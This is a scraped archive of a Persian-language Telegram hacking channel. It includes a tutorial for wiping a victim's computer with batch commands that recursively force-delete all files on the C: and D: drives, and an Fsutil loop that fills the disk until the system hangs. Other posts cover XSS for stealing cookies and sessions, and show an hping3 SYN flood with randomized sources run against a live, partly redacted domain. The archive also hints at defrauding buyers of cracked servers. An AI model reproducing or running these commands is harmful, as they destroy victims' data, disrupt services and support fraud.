ar
Feedback
Script Dev $

Script Dev $

الذهاب إلى القناة على Telegram
238
المشتركون
لا توجد بيانات24 ساعات
-87 أيام
-4630 أيام
أرشيف المشاركات
دوستان عزیز ، مراقب باشید که روی سیستم شخص بدافزار نباشه که اطلاعات بک کپی نخوره ، حتما چک کنید

با سلام خدمت همگی دوستان قدیمی و جدید توی این آموزش قراره راجب از بین بردن اطلاعات سیستم قربانی و به هنگ انداختن سیستم قربانی صحبت کنیم اما از اونجایی که کمیته فیلترینگ به این وبلاگ خیلی لطف داره مجبوریم یه خرده ریز توضیح بدیم تا خودتون کار اصلیشو انجام بدید همونطور که قبلا گفته بودم ویروسای مخرب همیشه از تکه کدهای ساده و کاربردی ایجاد میشن برای همین ما هم قراره توی این پست تکه کد ساده و کاربردی معرفی کنیم که میتونه اطلاعات یه سیستم رو از بین ببره و یکسری فایل آت و آشغال رو با فایلای اصلی و شاید مهم سیستم قربانی جایگزین کنه صد البته به جای اینکار ما میتونیم با دستور فرمت خیلی سریعتر و راحت تر اینکار رو انجام بدیم اما بعضی وقتا سطح دسترسی اجازه اینکار رو نمیده که ما هم خیلی راحت میتونیم با یه تکه کد ساده از یه روش دیگه پیروی کنیم یا اصن برنامه های کاربردی و مخرب دیگه بسازیم و اهداف خودمون رو پیاده سازی کنیم For /R D:\ %i in (*) do echo %i && Ping "LocalHost"  > nul -n 2 && CLS کد بالا رو که توی خط فرمان وارد کنید متوجه میشید که میاد و اسم تک تک فایلاتون رو دو ثانیه یکبار دونه به دونه نشون میده حالا ما میتونیم به جای دستور Echo از دستور Del استفاده کنیم تا به جای نمایش فایل ها اون فایل از بین بره For /R D:\ %i in (*) do del /F /S /Q %i && Ping "LocalHost"  > nul -n 2 && CLS که البته چون ما از دستور Ping استفاده کردیم و دستور دادیم که هر دو ثانیه یکبار یه فایل پاک بشه اینکار زیاد جالب نمیشه و ممکنه پروسه ی برناممون یه خرده طولانی بشه که بهتره این شکلی بنویسیم : For /R D:\ %i in (*) do del /F /S /Q %i CLS حتما دقت کنید از کدهای بالا داخل خط فرمان استفاده کنید و سریعا بعد از اجرا خط فرمان رو ببندین یا کلید های ترکیبی Ctrl + C رو فشار بدین تا کد وارد شده به روند اجرا و تخریب خودش ادامه نده و اینکه دقت کنین اگه قراره داخل یه Batch فایل قرار بدین و از راه دور به سیستم قربانی دسترسی ندارین باید به جای i% حتما از i%% استفاده کنین همونطور که گفتم هدفم یه اشاره ی ریز بود و حالا شما هستین که باید از تکه های بالا یه برنامه مخرب بسازین و به جای تخریب فایل های درایو D دستور تخریب فایل درایوای دیگه رو هم بدین For /R C:\ %%i in (*) do del /F /S /Q %%i CLS For /R D:\ %%i in (*) do del /F /S /Q %%i CLS Va... کدهای بالا هم برای یه فایل Batch هستش که باید به جای ...Va اسم درایوهای دیگه رو هم اضافه کنین ضمنا به این مورد اشاره کنم که میتونین علاوه بر لیست و حذف کردن فایل ها داخل کد به جای ستاره ( * ) از نقطه ( . ) استفاده کنین و اسم فولدرها یا همون پوشه های سیستم قربانی رو بدست بیارین و بعدش با دستور RmDir اونهارو از بین ببرید که من طرز نوشتنش رو گفتم و نوشتنش با خودتونه که یه خرده تنبل به بار نیاین :) حالا میرسیم به نحوه ی پر کردن هارد سیستم قربانی از اطلاعات چرت و پرت برای اینکار ما از دستور Fsutil استفاده میکنیم که خوشبختانه این دستور روی سیستم عامل های قدیمی هم موجوده و موجب میشه که ویروس ما روی همه ی سیستم عامل های ویندوزی اجرا بشه یه بچ فایل ایجاد کنین و کدهای پایین رو داخلش قرار بدین Cd %UserProfile%\Desktop :Start Fsutil file createnew %random%.bak %random% Fsutil file createnew %random%.mp3 %random% Fsutil file createnew %random%.mp4 %random% Goto Start وقتی که کدهارو قرار دادین با کلید های Ctrl + C اونارو داخل فایل ذخیره کنید و اونو اجرا کنین و سریع ببندید بعد از اجرا و بستن یه نیم نگاه به صفحه ی دسکتاپتون بندازین تا بهتر متوجه بشین که این کدها دقیقا قراره چیکار کنن در واقع این کدها میان یه فایل با اسم تصادفی و پسوند های bak و mp3 و mp4 فایل های چرت و پرت ایجاد میکنن که موجب میشه هارد سیستم قربانی از اطلاعات مزخرف پر بشه و اگه سیستم قربانی کم بیاره میتونه موجب هنگی سیستم طرفمون هم بشه... همچنین میتونیم به جای استفاده از %random% از یه سایز بیشتر هم برای فایلی که قراره ایجاد بشه استفاده کنیم Fsutil file createnew %random%.bak 999999999 مثلا کد بالا یه فایل معادل حجم یک گیگابایت ایجاد میکنه اما این کدها کاربردای دیگه هم داره به عنوان مثال اینروزا آدمایی هستن که سرور مجازی کرک میکنین و سرور های هارد دار رو میفروشن که با این روش میتونین فایل فیک روی سرور ایجاد کنن و سرورارو به خریدار اینجور سرور ها بفروشن... در کل کدی که قرار دادم رو یه خرده دستکاری کنین و سعی کنین اهدافتون رو خودتون پیاده سازی کنید اگر سوالی هم بود بپرسین حتما سر فرصت جوابتون رو میدم

حال همه خرابه

خستم واقعا شما چی

شما میخاید ایپی یا کوکی و سشن های چند نفرو بدست بیارید اول از همه میرید تو اون کامنتا تحلیل میکنید

برایه مثال یه سایت ک نظر سنجی داره و واسه کاربرا قابل نمایشه مثالا دیجی کالا که عملا فرم ورودی و خروجیش فیلتره و این فازینگ و حمله روش جواب نیست و این فقط یه تعوری و توضیح حساب میشه

خب حالا این متهاجم حمله ش بوسیله xss فازینگ cross - site scripting انجام بده؟

بروت حملات بوسیله cross-site scrpting type of injection مهاجم یه کد مخرب malicious رو به وبسایت تزریق میکنه

فازینگ و حملات بوسیه XSS کابوس اینپوت سرور وب
+3
فازینگ و حملات بوسیه XSS کابوس اینپوت سرور وب

dig cpcod——.com ; <<>> DiG 9.20.15-2-Debian <<>> cpcod——.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 582 ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 1232 ;; QUESTION SECTION: ;cpcod—-.com. IN A ;; ANSWER SECTION: cpcod—-.com. 102 IN A 104.21.64.28 cpcod—-.com. 102 IN A 172.67.175.13 ;; Query time: 111 msec ;; SERVER: 10.255.255.1#53(10.255.255.1) (UDP) ;; WHEN: Wed Dec 17 15:00:45 CST 2025 ;; MSG SIZE rcvd: 74

┌──(kiya㉿imkiya)-[~/Desktop] └─$ sudo hping3 -c 10000000000 -d 12000 -S -p 443 --flood --rand-source cpcod———.com [sudo] password for kiya: HPING cpcod——.com (tun0 104.21.64.28): S set, 40 headers + 12000 data bytes hping in flood mode, no replies will be shown یکی از مزایای hping3 تارگت بصورت دامین هم بدی خودکار ایپی ک ضعیف تره رو اینجکت و حمله اتوماسیون انجام میشه مثل نمونه

بین فلادینگ ریزی که میبینید ip vps & server که پشت cdn و بهترین فایروال و اینتروک هست رو اختلال ایجاد میکنه بنظرم این همه حجم خلاقیت هم هنوز قدیمی نشده

simplescreenrecorder-2025-12-17_14.51.53.mkv1.99 MB

photo content

یک نمونه برا. تست Sudo hping3 -c 1000000 -d 120000 -s - پورت باز -flood -rand-source ایپی تارگت

A | ----> syn | B A | syn ack | b A | ack | b حملات بین فلادینگ

Syn flooding ? How connection is tcp?

Ddos? : dis tribated dos

Dos Flood attack & Logic